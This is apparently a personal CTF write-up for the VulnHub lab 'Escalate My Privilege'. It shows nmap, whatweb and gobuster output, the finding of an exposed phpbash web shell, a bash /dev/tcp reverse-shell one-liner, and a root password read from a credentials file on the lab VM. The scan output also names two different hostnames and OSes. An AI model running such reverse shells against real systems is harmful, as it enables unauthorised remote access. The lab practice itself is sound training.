👀
WriteUps
  • WHOAMI
  • Try Hack Me - THM
    • Linux Boxes
      • Simple CTF
      • Basic Pentesting
      • Kenobi
      • TomGhost
      • Game Zone
      • Skynet
      • Daily Bugle
      • Dogcat
      • Anonymous
      • Wonderland
      • Blog
      • HaskHell
    • Windows Boxes
      • Blue
      • Alfred
      • HackPark
      • Retro
    • Windows Rooms
      • Windows Exploitation
        • Intro to Windows
        • Windows Fundamentals 1
        • Windows Fundamentals 2
      • Active Directory
        • Active Directory Basics
    • Privilege Escalation Rooms
      • Linux
        • Linux PrivEsc
        • Common Linux Privesc
      • Windows
        • Windows PrivEsc
    • Crypto Rooms
      • Hashing - Crypto 101
      • Encryption - Crypto 101
    • Web Rooms
      • OWASP Top 10
        • 1. Injection
        • 2. Broken Authentication
        • 3. Sensitive Data Exposure
        • 4. XML External Entity
        • 5. Broken Access Control
        • 6. Security Misconfiguration
        • 7. Cross-site Scripting
        • 8. Insecure Deserialization
        • 9. Components with Known Vulnerabilities
        • 10. Insufficent Logging & Monitoring
    • MISC
      • Tools
        • John The Ripper
        • Metasploit
      • Git Happens
      • What the Shell?
  • HACK THE BOX - HTB
    • Linux Boxes
      • CAP
      • KNIFE
      • BOUNTYHUNTER
      • PREVISE
      • DYNSTR
      • PIT
      • SEAL
  • VulnHub
    • KIOPTRIX Series
      • KIOPTRIX Level 1 (#1)
      • KIOPTRIX Level 1.1 (#2)
      • KIOPTRIX Level 1.2 (#3)
      • KIOPTRIX Level 1.3 (#4)
    • Privilege Escalation
      • Escalate Linux
      • Escalate My Privilege
    • MISC
      • Misdirection
      • TOPPO
      • NULLBYTE
Powered by GitBook
On this page
  • Scanning
  • Enumeration
  • Exploiting
  • Privilege Escalation
  1. VulnHub
  2. Privilege Escalation

Escalate My Privilege

Scanning

Nmap

➜  ~ sudo nmap -A -p- -T4 Esclinux.vuln 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 10:27 EDT
Nmap scan report for Esclinux.vuln (172.16.129.139)
Host is up (0.0011s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34511/udp   mountd
|   100005  1,2,3      50751/tcp   mountd
|   100005  1,2,3      55807/tcp6  mountd
|   100005  1,2,3      57755/udp6  mountd
|   100021  1,3,4      38135/tcp   nlockmgr
|   100021  1,3,4      38777/tcp6  nlockmgr
|   100021  1,3,4      54049/udp   nlockmgr
|   100021  1,3,4      60507/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     3 (RPC #100227)
38135/tcp open  nlockmgr    1-4 (RPC #100021)
41879/tcp open  mountd      1-3 (RPC #100005)
50079/tcp open  mountd      1-3 (RPC #100005)
50751/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:9F:EB:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUX

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: osboxes
|   NetBIOS computer name: LINUX\x00
|   Domain name: \x00
|   FQDN: osboxes
|_  System time: 2021-08-12T10:27:39-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-08-12T14:27:39
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   1.07 ms Esclinux.vuln (172.16.129.139)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.98 seconds

Enumeration

port 80 is opened let's take a look

landing page OK ...

Whatweb

➜  ~ sudo whatweb privlinux.vuln    
http://privlinux.vuln [200 OK] Apache[2.4.6], Country[RESERVED][ZZ], HTML5, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[172.16.129.140], PHP[5.4.16], Title[Check your Privilege]

Check directory

➜  ~ gobuster dir -u http://privlinux.vuln -w ~/SecLists/Discovery/Web-Content/common.txt     
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://privlinux.vuln
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/x/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 08:51:08 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 211]
/.htaccess            (Status: 403) [Size: 211]
/.hta                 (Status: 403) [Size: 206]
/cgi-bin/             (Status: 403) [Size: 210]
/index.html           (Status: 200) [Size: 240]
/phpinfo.php          (Status: 200) [Size: 51567]
/robots.txt           (Status: 200) [Size: 37]   

===============================================================
2021/08/13 08:51:09 Finished
===============================================================

lets take a look on /robots.txt

/phpbash.php looks interesting ...

we have a Shell hear !!

Exploiting

Reverse shell

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Privilege Escalation

dive into cd /home/armour we find Credentials.txt

we have root password here !!!

Credentials : root:rootroot1

PreviousEscalate LinuxNextMISC

Last updated 3 years ago